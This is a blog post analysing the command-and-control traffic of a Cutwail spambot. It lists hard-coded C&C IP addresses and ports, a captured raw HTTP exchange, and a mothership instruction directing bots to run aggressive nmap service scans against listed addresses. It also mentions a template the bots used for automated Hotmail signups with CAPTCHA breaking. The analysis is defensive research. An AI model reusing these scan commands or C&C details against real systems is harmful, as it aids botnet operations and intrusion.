BjOG – Bjou’s Blog, that is!

Recently, while analyzing network traffic of a Cutwail binary (a spambot commonly installed by a trojan of the Pushdo family), I found some interesting behavior in its command-and-control communication. Although I expected some encrypted HTTP communication on port 4080 as stated in the recent research about the TOP Spam Botnets from April 2008, I found a completely different setup. First, there have been over a dozen backend nodes (motherships) all in the 216.195.[52-63] range. Analyzing the binary revealed more hard-coded IP addresses in Russia and the US:


78.109.30.80
78.109.30.64
78.109.30.56
78.109.30.48
78.109.30.24
78.109.30.32
78.109.30.16
78.109.29.240
78.109.29.232
78.109.30.8
216.195.63.18
216.195.57.116
208.71.130.48
208.71.130.144
216.195.63.19
216.195.63.20
216.195.63.25
216.195.63.36
216.195.56.250
216.195.56.251
216.195.57.125
216.195.63.21
216.195.63.22
216.195.63.23
216.195.63.24
216.195.52.17
216.195.52.18
216.195.52.157


Moreover, traffic was not completely encrypted and not at all on port 4080/tcp. Ports in use have been 7230/tcp (encrypted), 8195/tcp (encrypted), 8001/tcp (plain), 3078 (plain) and 3128 (plain with base64-encoded HTTP payload representing IP addresses (in decimal) for whatever reason, see below). Again, data shown is not sanitized or censored in any way.

POST / HTTP/1.1
Accept: */*
Accept-Language: en
Cache-Control: no-cache
Pragma: no-cache
Accept-Charset: iso-8859-1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 216.195.55.10:3128
Content-Length: 85
Connection: Keep-Alive

data=5NIkrmdE9mkmNhBBD+yxLNZAUjtwQNC0uO4Gxf17PH6RUuBFmKfWGzYC6IecvQ3INDLDOEaJlyr37hwE

HTTP/1.1 200 OK
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Cache-Control: no-cache
Date: Fri, 29 Aug 2008 19:23:32 GMT
Last-Modified: Fri, 29 Aug 2008 19:23:32 GMT
Server: Apache/1.3.35 (Unix) PHP/4.4.2
Content-Length: 110

{NTQx9k+dqZV6afQgf2ABxEjDK5OPtU2/XPa8nj4GndeDqESDAmD0XeGBu1SS7ux0pL9vTIIFzqeYtyMXbJQMOZxHIz2ZaBBWFnttDXrlUcp=}.

Moreover, I found that the bots tried to automatically create Hotmail accounts using an XML template that has been provided by a mothership before. I uploaded the template for the interested reader. This template is a guide through the Hotmail signup form, apparently also able to break CAPTCHAs. Furthermore, one bot additionally downloaded nmap and received instructions from a mothership containing nmap options and IP addresses.

.{....+\....-T5 -sV.128.194.136.173.53,80...+\....-T5 -sV.128.194.136.147.53,80...+\....-T5 -sV.128.194.137.81.53,80...+\....-T5 -sV.128.194.137.101.53,80...+\....-T5 -sV.128.194.136.240.53,80...+\....-T5 -sV.128.194.137.16.53,80...+\....-T5 -sV.128.194.137.136.53,80...+\....-T5 -sV.128.194.137.95.53,80...+\....-T5 -sV.128.194.137.35.53,80...+\....-T5 -sV.128.194.137.42.53,80.

Option -sV: Probe open ports to determine service/version info
Option -T5: Set timing template (higher is faster) <– 5 is the highest

As can be seen, the control in the botnet’s background is done via pretty diverse channels. Of course, one major task of the bot is still spamming, this short analysis concentrated on its C&C, however, using binaries from July/August 2008. Note, that this study might not be up to date any more by now…